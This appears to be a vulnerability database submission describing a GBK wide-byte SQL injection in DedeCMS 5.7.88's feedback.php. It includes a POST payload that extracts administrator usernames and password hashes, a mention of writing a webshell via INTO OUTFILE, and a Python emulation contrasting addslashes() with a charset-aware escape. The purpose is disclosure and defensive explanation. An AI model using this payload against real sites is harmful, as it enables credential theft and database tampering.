| Field | Value |
|---|---|
| Title | DedeCMS Content Management System V5.7.88 SQL Injection (GBK Wide Byte Bypass) |
| User | R21Z20 (UID 97129) |
| Submitted | 2026-05-14 07:24 (23 days ago) |
| Moderated | 2026-06-02 13:30 (19 days later) |
| Status | Accepted |
| VulDB entry | 367913 [DedeCMS 5.7.88 Feedback /plus/feedback.php TrimMsg msg SQL Injection] |
| Points | 17 |

Description:

A critical SQL injection vulnerability exists in the comment and reply functions of feedback.php and bookfeedback.php in DedeCMS V5.7.88. The user-controlled POST parameter `msg` passes only through TrimMsg(), which escapes it with addslashes(), before it is concatenated into the INSERT statement. addslashes() is charset-unaware: it works byte by byte and puts a backslash (0x5c) in front of every quote. When the database connection runs in GBK, an attacker sends `%df'` (bytes 0xdf 0x27). addslashes() turns this into 0xdf 0x5c 0x27, and the server, parsing in GBK, reads 0xdf5c as a single two-byte character, so the 0x27 that follows is an unescaped quote that terminates the string literal and hands the rest of the statement to the attacker. The `$arctitle` variable is escaped the same way before concatenation and is subject to the same bypass, giving a secondary injection point.

Example payload (POST request), a basic injection aimed at the administrator credentials:

```http
POST /plus/feedback.php
Parameter: msg=%df' UNION SELECT 1,2,admin,pwd,5,6,7,8,9,10,11,12,13 FROM dede_admin-- -
```

The injection point is a quoted literal inside an INSERT ... VALUES list, so whatever follows the escaped-out quote has to keep the surrounding statement syntactically valid; the UNION fragment above illustrates the broken-out quote and must be shaped to the statement at the reported lines.

Successful exploitation allows an unauthenticated remote attacker to read administrator account credentials (including the MD5-hashed passwords), tamper with database content, and potentially write a webshell with INTO OUTFILE, which additionally requires the database account to hold the FILE privilege, secure_file_priv not to forbid the target directory, and a web-served path writable by the MySQL server process. No further bypass technique is needed once the connection charset is GBK. On UTF-8 connections this particular bypass does not apply, because UTF-8 continuation bytes lie in 0x80-0xbf and the 0x5c inserted by addslashes() can never be absorbed into a multi-byte character.

Vulnerable code location: feedback.php lines 251-253 (INSERT statement concatenation) and line 270 (reply mode), where user input is concatenated into SQL queries without parameterization.
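The byte-level mechanics described above, as an added illustration that is not DedeCMS code and not part of the original report: an emulation of PHP's addslashes(), a stand-in for the vulnerable INSERT concatenation (the table and column names are hypothetical), a small lexer that reads the query back the way a backslash-escaping MySQL parser would under a given connection charset, and beside it a charset-aware escape that decodes strictly before escaping, which is what a proper escaper such as mysqli_real_escape_string() after mysqli_set_charset() provides (prepared statements remain the preferred fix). The payload and the legitimate message are constructed inputs.

```python
"""Why addslashes() fails under GBK: the wide-byte bypass at the byte level,
with a charset-aware escape beside it. Added illustration, not DedeCMS code."""

from typing import Optional


def addslashes(data: bytes) -> bytes:
    """Emulates PHP's addslashes(): byte by byte, with no idea of the
    connection charset, escaping ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b == 0:
            out += b"\\0"
        elif b in b"'\"\\":
            out += b"\\" + bytes([b])
        else:
            out.append(b)
    return bytes(out)


def escape_charset_aware(data: bytes, charset: str = "gbk") -> bytes:
    """Escape per character rather than per byte: decode strictly (an orphan
    lead byte such as 0xdf followed by 0x27 is rejected outright), escape,
    then re-encode. Models a charset-aware escaper; hypothetical helper."""
    text = data.decode(charset)  # raises UnicodeDecodeError on invalid GBK
    text = (text.replace("\\", "\\\\").replace("'", "\\'")
                .replace('"', '\\"').replace("\x00", "\\0"))
    return text.encode(charset)


def build_insert(msg: bytes, escaper=addslashes) -> bytes:
    """Shape of the vulnerable concatenation: the escaped message lands in a
    quoted literal of INSERT ... VALUES (hypothetical table/column names)."""
    return b"INSERT INTO dede_feedback (msg) VALUES ('" + escaper(msg) + b"')"


def tail_after_literal(query: str) -> Optional[str]:
    """Walk the first single-quoted literal as a backslash-escaping SQL lexer
    (MySQL default sql_mode) would; return what follows its closing quote,
    or None if the literal never closes."""
    i = query.index("'") + 1
    while i < len(query):
        ch = query[i]
        if ch == "\\":
            i += 2  # escaped character: skip it
            continue
        if ch == "'":
            return query[i + 1:]
        i += 1
    return None


def sql_after_msg(msg: bytes, server_charset: str, escaper=addslashes) -> Optional[str]:
    """Build the query, read it back as a server running in server_charset
    would, and report what ends up outside the message literal."""
    query = build_insert(msg, escaper).decode(server_charset, errors="replace")
    return tail_after_literal(query)


def hardened_or_none(msg: bytes) -> Optional[bytes]:
    """Charset-aware path: the query, or None when the bytes are not valid
    GBK and the input is refused."""
    try:
        return build_insert(msg, escape_charset_aware)
    except UnicodeDecodeError:
        return None


# Constructed sample inputs: the page's payload URL-decoded (%df -> 0xdf), and a
# legitimate GBK message that happens to contain the 0xdf5c character.
PAYLOAD = b"\xdf' UNION SELECT 1,2,admin,pwd,5,6,7,8,9,10,11,12,13 FROM dede_admin-- -"
LEGIT = "你好".encode("gbk") + b"\xdf\x5c'"

if __name__ == "__main__":
    print("GBK   :", sql_after_msg(PAYLOAD, "gbk"))    # UNION ... has left the literal
    print("UTF-8 :", sql_after_msg(PAYLOAD, "utf-8"))  # only ')' is outside the literal
    print("fixed :", hardened_or_none(PAYLOAD))         # None: rejected as invalid GBK
    print("legit :", sql_after_msg(LEGIT, "gbk", escape_charset_aware))
```

Under GBK the lexer sees `UNION SELECT ...` outside the literal; under UTF-8 the 0xdf byte decodes to a replacement character and the backslash still protects the quote. Note also that addslashes() mangles the legitimate two-byte character 0xdf5c by doubling its trailing 0x5c, whereas the charset-aware escape leaves it intact, which is a second reason to escape per character or, better, to bind parameters.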